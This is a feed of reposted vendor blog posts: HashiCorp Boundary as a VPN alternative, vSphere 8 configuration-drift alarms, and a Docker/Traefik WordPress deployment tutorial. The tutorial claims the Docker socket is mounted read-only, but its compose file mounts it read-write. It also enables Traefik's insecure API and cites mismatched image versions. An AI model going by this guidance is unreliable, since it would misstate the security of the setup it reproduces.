A lot of the focus internally at HashiCorp has been around improving Boundary user experience and making connectivity simple and secure without introducing specific vendor CLI nuance to tried and tested workflows. This is obviously an important factor to the feature, but the picture is bigger.

VPNs have been a mainstay in organizations for many years and still feature heavily today. The ability to create that private, encrypted tunnel comes with some potential obstacles and issues:

  1. Complexity : Setting up secure VPNs is not a trivial task. Furthermore, the overhead of managing them, if not done correctly, could potentially create security vulnerabilities within your network.
  2. Cost: The overall cost of a VPN solution can add up. Whether this is infrastructure costs, where maintaining a VPN requires investment in hardware, software, and ongoing maintenance; or for licensing, which can be expensive, especially for large organizations with many users.
  3. Security : There is always the possibility that when you are bridged onto the network through a VPN, a user can move laterally around the network, potentially seeing targets and resources that they should not have the ability to see. Yes, there are third-party tools and native capabilities with some VPNs to control this, but then that becomes yet another touchpoint that you have to set up correctly and keep up to date. Furthermore, VPNs do not manage the credentials required to securely authenticate to your desired targets.

When you compare the points above to a Boundary deployment with transparent sessions, then it’s a different narrative. From a complexity perspective, if you are using HCP Boundary then it’s a push-button deployment and HashiCorp manages the infrastructure for you. Even with self-managed Boundary deployments, you have Terraform modules to stand-up the environment. But the main advantage is better security.

As Boundary can be integrated with your IdP of choice. You can also control what targets / resources each authenticated user has access to from a central point, based on their role within your organization. An example I often give is that if I am a server admin, then arguably the only resources I’d need to have access to, to do my job, are servers. The same analogy applies to databases and DBAs.

In addition, the general onboarding and offboarding process for users in your organization is also driven via your IdP and automatically reflected in Boundary using managed groups. This all aids in reducing the operational complexity and toil within your environment.

So, are you now at a point where organizations can start to rethink their VPN strategy in favor of a Boundary deployment? Well, I mentioned that in one of my previous blogs when I discussed a Boundary multi-hop worker deployment. This is where you deploy an ingress worker that is publicly addressed, as well as deploying one or more egress workers that are residing within a private network(s). Users can then reach targets within that private network, but without the use of a VPN. However you couldn’t control secure access to HTTPS targets — whether that be internally hosted web pages or internally hosted SaaS applications.

With the addition of transparent sessions, you can. Organizations can now fully control access to their privately hosted SaaS targets, websites, other HTTPS targets, SSH, remote desktop, Kubernetes, database, and anything else that supports TCP. With the addition of transparent sessions, Boundary has now taken a leap forward to be positioned to remove VPNs from your environment, along with the associated risk, complexity, and cost.

Try HCP Boundary for free

To try this solution for yourself, the GitHub repo can be found here. To sign up for a free trial of HashiCorp’s managed Boundary service, the HashiCorp Cloud Platform Boundary product is free for the first 5 users.



from HashiCorp Blog https://ift.tt/4SD3Zke
via IFTTT

Easily monitor vSphere 8 configuration drift with Configuration profiles and custom alarms

 

Configuration drift is a common challenge in virtualized environments, where changes to the configuration of hosts or clusters can lead to inconsistencies and potential issues. You want to be able to monitor potential configuration drift within larger VMware vSphere environments. In this blog post, we’ll explore how to set up and use vSphere 8 and Configuration profiles to ensure your environment remains compliant and stable.

Understanding Configuration Drift

Configuration drift occurs when the actual configuration of a cluster or host deviates from its desired state. This can happen due to manual changes, automated processes, or even misconfigurations. Over time, configuration drift can lead to performance issues, security vulnerabilities, and compliance problems. Monitoring and managing configuration drift is essential to maintain the health and stability of your virtualized environment.

Since vSphere 8 U1 administrators have a feature called configuration profiles. We have already blogged about this feature here – vSphere 8.0 U1 Configuration Profiles, and here for v8.0 U2 – vSphere Configuration Profiles – How VMware vCenter Server 8.0 U2 Can Simplify and Optimize vSphere Infrastructure Administration.

vSphere Configuration Profiles

vSphere Configuration Profiles are a feature in VMware vSphere that allows administrators to define and enforce a desired configuration state for clusters and hosts. By creating configuration profiles, you can specify the settings and policies that should be applied to your environment. These profiles can include network settings, security policies, storage configurations, and more.

We’ll have a look at how can we easily monitor vSphere 8 configuration drift with Configuration profiles via custom alarm definition.

If you have a drift in your vSphere configuration, you’d like to be notified, right? We can do that. You can create a custom alarm which will trigger when a host (or multiple hosts), in your cluster, is not compliant with the cluster configuration.

Requirements

vSphere Configuration Profiles requires the following:

  • Cluster lifecycle must be managed with vSphere Lifecycle Manager Images (vLCM).
  • Hosts must be on versions ESXi 8.0 and above.
  • This feature is available with Enterprise Plus license.

Limitatons

Now none, but previous releases of vSphere had some. There were limitations to vSphere configuration profiles and vDS (distributed vSwitch). However, since 8.0 U1, vDS are supported.

Starting with vSphere 8.0 Update 1, you can enable vSphere Configuration Profiles on a cluster that uses a vSphere Distributed Switch.

Also, there was another limitation which has been solved in U3:

Quote:

Starting with vSphere 8.0 Update 3, you can enable vSphere Configuration Profiles on a cluster that you manage with baselines. The transition workflow starts with selecting a reference host which configuration schema is imported and used as a desired cluster configuration schema.

How to create a custom alarm definition and at which level?

While in vCenter server, it depends at which level you create a new alarm. (Host level, cluster, or datacenter).

Depending on what you want to achieve, but you can also create several alarm definitions and apply them to the different types of clusters (production, testing, monitoring). Then a production cluster will trigger a critical level alarm, and a test cluster only trigger a warning level alarm.

Note: for now, we need to create a custom alarm, but future release of vSphere will have a built-in alarm definition created by default.

The configuration check runs every 8 hours so the vSphere Configuration profiles does compare the cluster against the configuration. The alarms triggers when both manual and automatic compliance checks are invoked. (Yes, you can run the compliance test manually too).

Open vSphere client and go to:

navigate to vCenter > Configure > Alarm Definitions > ADD

Create new alarm and follow the assistant

Create new alarm and follow the assistant

 

Click Next and in the argument field, paste this:

com.vmware.vcIntegrity.ClusterConfigurationOutOfCompliance

Note: there are two types or more of alarm rule arguments:

com.vmware.vcIntegrity.HostConfigurationOutOfCompliance for host alarms or com.vmware.vcIntegrity.ClusterConfigurationOutOfCompliance for cluster alarms.

In the argument field, paste this

In the argument field, paste this

 

Then trigger the alarm and show as warning, then enable the email notification.

Click next to move on and validate the alarm creation.

Review the new alarm definition and click Create

Review the new alarm definition and click Create

 

Once done, you should see it created in the Alarm Definition sections.

New alarm should appear at the top

New alarm should appear at the top

 

You can then test the alarm by changing some value within your cluster. You can add a new vNic without uplink or create empty vSwitch on one host.

Then when you go and navigate to the desired state configuration of your cluster, you can check compliance and see that your host will appear as non-compliant there should be a new alarm triggered at the cluster level. You will see all hosts that differs from the config, with an alarm, at the vCenter or cluster level monitor tab.

Source: vSphere blog

Final Words

Monitoring configuration drift with alarms for vSphere Configuration Profiles in vSphere 8.0 U3 is a powerful way to maintain the health and stability of your virtualized environment. By setting up configuration profiles and alarms, you can ensure that your VMs and hosts remain compliant with your desired configuration state. This proactive approach helps prevent performance issues, security vulnerabilities, and compliance problems, keeping your environment running smoothly. Future version of VMware vSphere shall have those alarm built-in. Hopefully the configuration drift and configuration profiles will get even more enhancements in the future.



from StarWind Blog https://ift.tt/wXEma4r
via IFTTT

Dockerize WordPress: Simplify Your Site’s Setup and Deployment

If you’ve ever been tangled in the complexities of setting up a WordPress environment, you’re not alone. WordPress powers more than 40% of all websites, making it the world’s most popular content management system (CMS). Its versatility is unmatched, but traditional local development setups like MAMP, WAMP, or XAMPP can lead to inconsistencies and the infamous “it works on my machine” problem.

As projects scale and teams grow, the need for a consistent, scalable, and efficient development environment becomes critical. That’s where Docker comes into play, revolutionizing how we develop and deploy WordPress sites. To make things even smoother, we’ll integrate Traefik, a modern reverse proxy that automatically obtains TLS certificates, ensuring that your site runs securely over HTTPS. Traefik is available as a Docker Official Image from Docker Hub.

In this comprehensive guide, I’ll show how to Dockerize your WordPress site using real-world examples. We’ll dive into creating Dockerfiles, containerizing existing WordPress instances — including migrating your data — and setting up Traefik for automatic TLS certificates. Whether you’re starting fresh or migrating an existing site, this tutorial has you covered.

Let’s dive in!

Dockerize WordPress App

Why should you containerize your WordPress site?

Containerizing your WordPress site offers a multitude of benefits that can significantly enhance your development workflow and overall site performance.

Increased page load speed

Docker containers are lightweight and efficient. By packaging your application and its dependencies into containers, you reduce overhead and optimize resource usage. This can lead to faster page load times, improving user experience and SEO rankings.

Efficient collaboration and version control

With Docker, your entire environment is defined as code. This ensures that every team member works with the same setup, eliminating environment-related discrepancies. Version control systems like Git can track changes to your Dockerfiles and to wordpress-traefik-letsencrypt-compose.yml, making collaboration seamless.

Easy scalability

Scaling your WordPress site to handle increased traffic becomes straightforward with Docker and Traefik. You can spin up multiple Docker containers of your application, and Traefik will manage load balancing and routing, all while automatically handling TLS certificates.

Simplified environment setup

Setting up your development environment becomes as simple as running a few Docker commands. No more manual installations or configurations — everything your application needs is defined in your Docker configuration files.

Simplified updates and maintenance

Updating WordPress or its dependencies is a breeze. Update your Docker images, rebuild your containers, and you’re good to go. Traefik ensures that your routes and certificates are managed dynamically, reducing maintenance overhead.

Getting started with WordPress, Docker, and Traefik

Before we begin, let’s briefly discuss what Docker and Traefik are and how they’ll revolutionize your WordPress development workflow.

  • Docker is a cloud-native development platform that simplifies the entire software development lifecycle by enabling developers to build, share, test, and run applications in containers. It streamlines the developer experience while providing built-in security, collaboration tools, and scalable solutions to improve productivity across teams.
  • Traefik is a modern reverse proxy and load balancer designed for microservices. It integrates seamlessly with Docker and can automatically obtain and renew TLS certificates from Let’s Encrypt.

How long will this take?

Setting up this environment might take around 45-60 minutes, especially if you’re integrating Traefik for automatic TLS certificates and migrating an existing WordPress site.

Documentation links

Tools you’ll need

  • Docker Desktop: If you don’t already have the latest version installed, download and install Docker Desktop.
  • A domain name: Required for Traefik to obtain TLS certificates from Let’s Encrypt.
  • Access to DNS settings: To point your domain to your server’s IP address.
  • Code editor: Your preferred code editor for editing configuration files.
  • Command-line interface (CLI): Access to a terminal or command prompt.
  • Existing WordPress data: If you’re containerizing an existing site, ensure you have backups of your WordPress files and MySQL database.

What’s the WordPress Docker Bitnami image?

To simplify the process, we’ll use the Bitnami WordPress image from Docker Hub, which comes pre-packaged with a secure, optimized environment for WordPress. This reduces configuration time and ensures your setup is up to date with the latest security patches.

Using the Bitnami WordPress image streamlines your setup process by:

  • Simplifying configuration: Bitnami images come with sensible defaults and configurations that work out of the box, reducing the time spent on setup.
  • Enhancing security: The images are regularly updated to include the latest security patches, minimizing vulnerabilities.
  • Ensuring consistency: With a standardized environment, you avoid the “it works on my machine” problem and ensure consistency across development, staging, and production.
  • Including additional tools: Bitnami often includes helpful tools and scripts for backups, restores, and other maintenance tasks.

By choosing the Bitnami WordPress image, you can leverage a tested and optimized environment, reducing the risk of configuration errors and allowing you to focus more on developing your website.

Key features of Bitnami WordPress Docker image:

  • Optimized for production: Configured with performance and security in mind.
  • Regular updates: Maintained to include the latest WordPress version and dependencies.
  • Ease of use: Designed to be easy to deploy and integrate with other services, such as databases and reverse proxies.
  • Comprehensive documentation: Offers guides and support to help you get started quickly.

Why we use Bitnami in the examples:

In our Docker Compose configurations, we specified:

WORDPRESS_IMAGE_TAG=bitnami/wordpress:6.3.1

This indicates that we’re using the Bitnami WordPress image, version 6.3.1. The Bitnami image aligns well with our goals for a secure, efficient, and easy-to-manage WordPress environment, especially when integrating with Traefik for automatic TLS certificates.

By leveraging the Bitnami WordPress Docker image, you’re choosing a robust and reliable foundation for your WordPress projects. This approach allows you to focus on building great websites without worrying about the underlying infrastructure.

How to Dockerize an existing WordPress site with Traefik

Let’s walk through dockerizing your WordPress site using practical examples, including your .env and wordpress-traefik-letsencrypt-compose.yml configurations. We’ll also cover how to incorporate your existing data into the Docker containers.

Step 1: Preparing your environment variables

First, create a .env file in the same directory as your wordpress-traefik-letsencrypt-compose.yml file. This file will store all your environment variables.

Example .env file:

# Traefik Variables
TRAEFIK_IMAGE_TAG=traefik:2.9
TRAEFIK_LOG_LEVEL=WARN
TRAEFIK_ACME_EMAIL=your-email@example.com
TRAEFIK_HOSTNAME=traefik.yourdomain.com
# Basic Authentication for Traefik Dashboard
# Username: traefikadmin
# Passwords must be encoded using BCrypt https://hostingcanada.org/htpasswd-generator/
TRAEFIK_BASIC_AUTH=traefikadmin:$$2y$$10$$EXAMPLEENCRYPTEDPASSWORD

# WordPress Variables
WORDPRESS_MARIADB_IMAGE_TAG=mariadb:11.4
WORDPRESS_IMAGE_TAG=bitnami/wordpress:6.6.2
WORDPRESS_DB_NAME=wordpressdb
WORDPRESS_DB_USER=wordpressdbuser
WORDPRESS_DB_PASSWORD=your-db-password
WORDPRESS_DB_ADMIN_PASSWORD=your-db-admin-password
WORDPRESS_TABLE_PREFIX=wpapp_
WORDPRESS_BLOG_NAME=Your Blog Name
WORDPRESS_ADMIN_NAME=AdminFirstName
WORDPRESS_ADMIN_LASTNAME=AdminLastName
WORDPRESS_ADMIN_USERNAME=admin
WORDPRESS_ADMIN_PASSWORD=your-admin-password
WORDPRESS_ADMIN_EMAIL=admin@yourdomain.com
WORDPRESS_HOSTNAME=wordpress.yourdomain.com
WORDPRESS_SMTP_ADDRESS=smtp.your-email-provider.com
WORDPRESS_SMTP_PORT=587
WORDPRESS_SMTP_USER_NAME=your-smtp-username
WORDPRESS_SMTP_PASSWORD=your-smtp-password

Notes:

  • Replace placeholder values (e.g., your-email@example.com, your-db-password) with your actual credentials.
  • Do not commit this file to version control if it contains sensitive information.
  • Use a password encryption tool to generate the encrypted password for TRAEFIK_BASIC_AUTH. For example, you can use the htpasswd generator.

Step 2: Creating the Docker Compose file

Create a wordpress-traefik-letsencrypt-compose.yml file that defines your services, networks, and volumes. This YAML file is crucial for configuring your WordPress installation through Docker.

Example wordpress-traefik-letsencrypt-compose.yml.

networks:
  wordpress-network:
    external: true
  traefik-network:
    external: true

volumes:
  mariadb-data:
  wordpress-data:
  traefik-certificates:

services:
  mariadb:
    image: ${WORDPRESS_MARIADB_IMAGE_TAG}
    volumes:
      - mariadb-data:/var/lib/mysql
    environment:
      MARIADB_DATABASE: ${WORDPRESS_DB_NAME}
      MARIADB_USER: ${WORDPRESS_DB_USER}
      MARIADB_PASSWORD: ${WORDPRESS_DB_PASSWORD}
      MARIADB_ROOT_PASSWORD: ${WORDPRESS_DB_ADMIN_PASSWORD}
    networks:
      - wordpress-network
    healthcheck:
      test: ["CMD", "healthcheck.sh", "--connect", "--innodb_initialized"]
      interval: 10s
      timeout: 5s
      retries: 3
      start_period: 60s
    restart: unless-stopped

  wordpress:
    image: ${WORDPRESS_IMAGE_TAG}
    volumes:
      - wordpress-data:/bitnami/wordpress
    environment:
      WORDPRESS_DATABASE_HOST: mariadb
      WORDPRESS_DATABASE_PORT_NUMBER: 3306
      WORDPRESS_DATABASE_NAME: ${WORDPRESS_DB_NAME}
      WORDPRESS_DATABASE_USER: ${WORDPRESS_DB_USER}
      WORDPRESS_DATABASE_PASSWORD: ${WORDPRESS_DB_PASSWORD}
      WORDPRESS_TABLE_PREFIX: ${WORDPRESS_TABLE_PREFIX}
      WORDPRESS_BLOG_NAME: ${WORDPRESS_BLOG_NAME}
      WORDPRESS_FIRST_NAME: ${WORDPRESS_ADMIN_NAME}
      WORDPRESS_LAST_NAME: ${WORDPRESS_ADMIN_LASTNAME}
      WORDPRESS_USERNAME: ${WORDPRESS_ADMIN_USERNAME}
      WORDPRESS_PASSWORD: ${WORDPRESS_ADMIN_PASSWORD}
      WORDPRESS_EMAIL: ${WORDPRESS_ADMIN_EMAIL}
      WORDPRESS_SMTP_HOST: ${WORDPRESS_SMTP_ADDRESS}
      WORDPRESS_SMTP_PORT: ${WORDPRESS_SMTP_PORT}
      WORDPRESS_SMTP_USER: ${WORDPRESS_SMTP_USER_NAME}
      WORDPRESS_SMTP_PASSWORD: ${WORDPRESS_SMTP_PASSWORD}
    networks:
      - wordpress-network
      - traefik-network
    healthcheck:
      test: timeout 10s bash -c ':> /dev/tcp/127.0.0.1/8080' || exit 1
      interval: 10s
      timeout: 5s
      retries: 3
      start_period: 90s
    labels:
      - "traefik.enable=true"
      - "traefik.http.routers.wordpress.rule=Host(`${WORDPRESS_HOSTNAME}`)"
      - "traefik.http.routers.wordpress.service=wordpress"
      - "traefik.http.routers.wordpress.entrypoints=websecure"
      - "traefik.http.services.wordpress.loadbalancer.server.port=8080"
      - "traefik.http.routers.wordpress.tls=true"
      - "traefik.http.routers.wordpress.tls.certresolver=letsencrypt"
      - "traefik.http.services.wordpress.loadbalancer.passhostheader=true"
      - "traefik.http.routers.wordpress.middlewares=compresstraefik"
      - "traefik.http.middlewares.compresstraefik.compress=true"
      - "traefik.docker.network=traefik-network"
    restart: unless-stopped
    depends_on:
      mariadb:
        condition: service_healthy
      traefik:
        condition: service_healthy

  traefik:
    image: ${TRAEFIK_IMAGE_TAG}
    command:
      - "--log.level=${TRAEFIK_LOG_LEVEL}"
      - "--accesslog=true"
      - "--api.dashboard=true"
      - "--api.insecure=true"
      - "--ping=true"
      - "--ping.entrypoint=ping"
      - "--entryPoints.ping.address=:8082"
      - "--entryPoints.web.address=:80"
      - "--entryPoints.websecure.address=:443"
      - "--providers.docker=true"
      - "--providers.docker.endpoint=unix:///var/run/docker.sock"
      - "--providers.docker.exposedByDefault=false"
      - "--certificatesresolvers.letsencrypt.acme.tlschallenge=true"
      - "--certificatesresolvers.letsencrypt.acme.email=${TRAEFIK_ACME_EMAIL}"
      - "--certificatesresolvers.letsencrypt.acme.storage=/etc/traefik/acme/acme.json"
      - "--metrics.prometheus=true"
      - "--metrics.prometheus.buckets=0.1,0.3,1.2,5.0"
      - "--global.checkNewVersion=true"
      - "--global.sendAnonymousUsage=false"
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock
      - traefik-certificates:/etc/traefik/acme
    networks:
      - traefik-network
    ports:
      - "80:80"
      - "443:443"
    healthcheck:
      test: ["CMD", "wget", "http://localhost:8082/ping","--spider"]
      interval: 10s
      timeout: 5s
      retries: 3
      start_period: 5s
    labels:
      - "traefik.enable=true"
      - "traefik.http.routers.dashboard.rule=Host(`${TRAEFIK_HOSTNAME}`)"
      - "traefik.http.routers.dashboard.service=api@internal"
      - "traefik.http.routers.dashboard.entrypoints=websecure"
      - "traefik.http.services.dashboard.loadbalancer.server.port=8080"
      - "traefik.http.routers.dashboard.tls=true"
      - "traefik.http.routers.dashboard.tls.certresolver=letsencrypt"
      - "traefik.http.services.dashboard.loadbalancer.passhostheader=true"
      - "traefik.http.routers.dashboard.middlewares=authtraefik"
      - "traefik.http.middlewares.authtraefik.basicauth.users=${TRAEFIK_BASIC_AUTH}"
      - "traefik.http.routers.http-catchall.rule=HostRegexp(`{host:.+}`)"
      - "traefik.http.routers.http-catchall.entrypoints=web"
      - "traefik.http.routers.http-catchall.middlewares=redirect-to-https"
      - "traefik.http.middlewares.redirect-to-https.redirectscheme.scheme=https"
    restart: unless-stopped

Notes:

  • Networks: We’re using external networks (wordpress-network and traefik-network). We’ll create these networks before deploying.
  • Volumes: Volumes are defined for data persistence.
  • Services: We’ve defined mariadb, wordpress, and traefik services with the necessary configurations.
  • Health checks: Ensure that services are healthy before dependent services start.
  • Labels: Configure Traefik routing, HTTPS settings, and enable the dashboard with basic authentication.

Step 3: Creating external networks

Before deploying your Docker Compose configuration, you need to create the external networks specified in your wordpress-traefik-letsencrypt-compose.yml.

Run the following commands to create the networks:

docker network create traefik-network
docker network create wordpress-network

Step 4: Deploying your WordPress site

Deploy your WordPress site using Docker Compose with the following command (Figure 1):

docker compose -f wordpress-traefik-letsencrypt-compose.yml -p website up -d
Screenshot of running "docker compose -f wordpress-traefik-letsencrypt-compose.yml -p website up -d" commmand.
Figure 1: Using Docker Compose to deploy your WordPress site.

Explanation:

  • -f wordpress-traefik-letsencrypt-compose.yml: Specifies the Docker Compose file to use.
  • -p website: Sets the project name to website.
  • up -d: Builds, (re)creates, and starts containers in detached mode.

Step 5: Verifying the deployment

Check that all services are running (Figure 2):

docker ps
Screenshot of services running, showing columns for Container ID, Image, Command, Created, Status, Ports, and Names.
Figure 2: Services running.

You should see the mariadb, wordpress, and traefik services up and running.

Step 6: Accessing your WordPress site and Traefik dashboard

WordPress site: Navigate to https://wordpress.yourdomain.com in your browser. Type in the username and password you set earlier in the .env file and click the Log In button. You should see your WordPress site running over HTTPS, with a valid TLS certificate automatically obtained by Traefik (Figure 3).

Screenshot of WordPress dashboard showing Site Health Status, At A Glance, Quick Draft, and other informational sections.
Figure 3: WordPress dashboard.

Important: To get cryptographic certificates, you need to set up A-type records in your external DNS zone that point to your server’s IP address where Traefik is installed. If you’ve just set up these records, wait a bit before starting the service installation because it can take anywhere from a few minutes to 48 hours — sometimes even longer — for these changes to fully spread across DNS servers.

  • Traefik dashboard: Access the Traefik dashboard at https://traefik.yourdomain.com. You’ll be prompted for authentication. Use the username and password specified in your .env file (Figure 4).
Screenshot of Traefik dashboard showing information on Entrypoints, Routers, Services, and Middleware.
Figure 4: Traefik dashboard.

Step 7: Incorporating your existing WordPress data

If you’re migrating an existing WordPress site, you’ll need to incorporate your existing files and database into the Docker containers.

Step 7.1: Restoring WordPress files

Copy your existing WordPress files into the wordpress-data volume.

Option 1: Using Docker volume mapping

Modify your wordpress-traefik-letsencrypt-compose.yml to map your local WordPress files directly:

volumes:
  - ./your-wordpress-files:/bitnami/wordpress

Option 2: Copying files into the running container

Assuming your WordPress backup is in ./wordpress-backup, run:

docker cp ./wordpress-backup/. wordpress_wordpress_1:/bitnami/wordpress/

Step 7.2: Importing your database

Export your existing WordPress database using mysqldump or phpMyAdmin.

Example:

mysqldump -u your_db_user -p your_db_name > wordpress_db_backup.sql

Copy the database backup into the MariaDB container:

docker cp wordpress_db_backup.sql wordpress_mariadb_1:/wordpress_db_backup.sql

Access the MariaDB container:

docker exec -it wordpress_mariadb_1 bash

Import the database:

mysql -u root -p${WORDPRESS_DB_ADMIN_PASSWORD} ${WORDPRESS_DB_NAME} < wordpress_db_backup.sql

Step 7.3: Update wp-config.php (if necessary)

Because we’re using environment variables, WordPress should automatically connect to the database. However, if you have custom configurations, ensure they match the settings in your .env file.

Note: The Bitnami WordPress image manages wp-config.php automatically based on environment variables. If you need to customize it further, you can create a custom Dockerfile.

Step 8: Creating a custom Dockerfile (optional)

If you need to customize the WordPress image further, such as installing additional PHP extensions or modifying configuration files, create a Dockerfile in your project directory.

Example Dockerfile:

# Use the Bitnami WordPress image as the base
FROM bitnami/wordpress:6.3.1

# Install additional PHP extensions if needed
# RUN install_packages php7.4-zip php7.4-mbstring

# Copy custom wp-content (if not using volume mapping)
# COPY ./wp-content /bitnami/wordpress/wp-content

# Set working directory
WORKDIR /bitnami/wordpress

# Expose port 8080
EXPOSE 8080

Build the custom image:

Modify your wordpress-traefik-letsencrypt-compose.yml to build from the Dockerfile:

wordpress:
  build: .
  # Rest of the configuration

Then, rebuild your containers:

docker compose -p wordpress up -d --build

Step 9: Customizing WordPress within Docker

Adding themes and plugins

Because we’ve mapped the wordpress-data volume, any changes you make within the WordPress container (like installing plugins or themes) will persist across container restarts.

  • Via WordPress admin dashboard: Install themes and plugins as you normally would through the WordPress admin interface (Figure 5).
Screenshot of WordPress admin dashboard showing plugin choices such as Classic Editor, Akismet Anti-spam, and Jetpack.
Figure 5: Adding plugins.
  • Manually: Access the container and place your themes or plugins directly.

Example:

docker exec -it wordpress_wordpress_1 bash
cd /bitnami/wordpress/wp-content/themes
# Add your theme files here

Managing and scaling WordPress with Docker and Traefik

Scaling your WordPress service

To handle increased traffic, you might want to scale your WordPress instances.

docker compose -p wordpress up -d --scale wordpress=3

Traefik will automatically detect the new instances and load balance traffic between them.

Note: Ensure that your WordPress setup supports scaling. You might need to externalize session storage or use a shared filesystem for media uploads.

Updating services

To update your services to the latest images:

Pull the latest images:

docker compose -p wordpress pull

Recreate containers:

docker compose -p wordpress up -d

Monitoring and logs

Docker logs:
View logs for a specific service:

docker compose -p wordpress logs -f wordpress

Traefik dashboard:
Use the Traefik dashboard to monitor routing, services, and health checks.

Optimizing your WordPress Docker setup

Implementing caching with Redis

To improve performance, you can add Redis for object caching.

Update wordpress-traefik-letsencrypt-compose.yml:

services:
  redis:
    image: redis:alpine
    networks:
      - wordpress-network
    restart: unless-stopped

Configure WordPress to use Redis:

  • Install a Redis caching plugin like Redis Object Cache.
  • Configure it to connect to the redis service.

Security best practices

  • Secure environment variables:
    • Use Docker secrets or environment variables to manage sensitive information securely.
    • Avoid committing sensitive data to version control.
  • Restrict access to Docker socket:
    • The Docker socket is mounted read-only (:ro) to minimize security risks.
  • Keep images updated:
    • Regularly update your Docker images to include security patches and improvements.

Advanced Traefik configurations

  • Middleware: Implement middleware for rate limiting, IP whitelisting, and other request transformations.
  • Monitoring: Integrate with monitoring tools like Prometheus and Grafana for advanced insights.
  • Wildcard certificates: Configure Traefik to use wildcard certificates if you have multiple subdomains.

Wrapping up

Dockerizing your WordPress site with Traefik simplifies your development and deployment processes, offering consistency, scalability, and efficiency. By leveraging practical examples and incorporating your existing data, we’ve created a tailored guide to help you set up a robust WordPress environment.

Whether you’re managing an existing site or starting a new project, this setup empowers you to focus on what you do best — developing great websites — while Docker and Traefik handle the heavy lifting.

So go ahead, give it a shot! Embracing these tools is a step toward modernizing your workflow and staying ahead in the ever-evolving tech landscape.

Learn more

To further enhance your skills and optimize your setup, check out these resources:



from Docker https://ift.tt/A7TBXWV
via IFTTT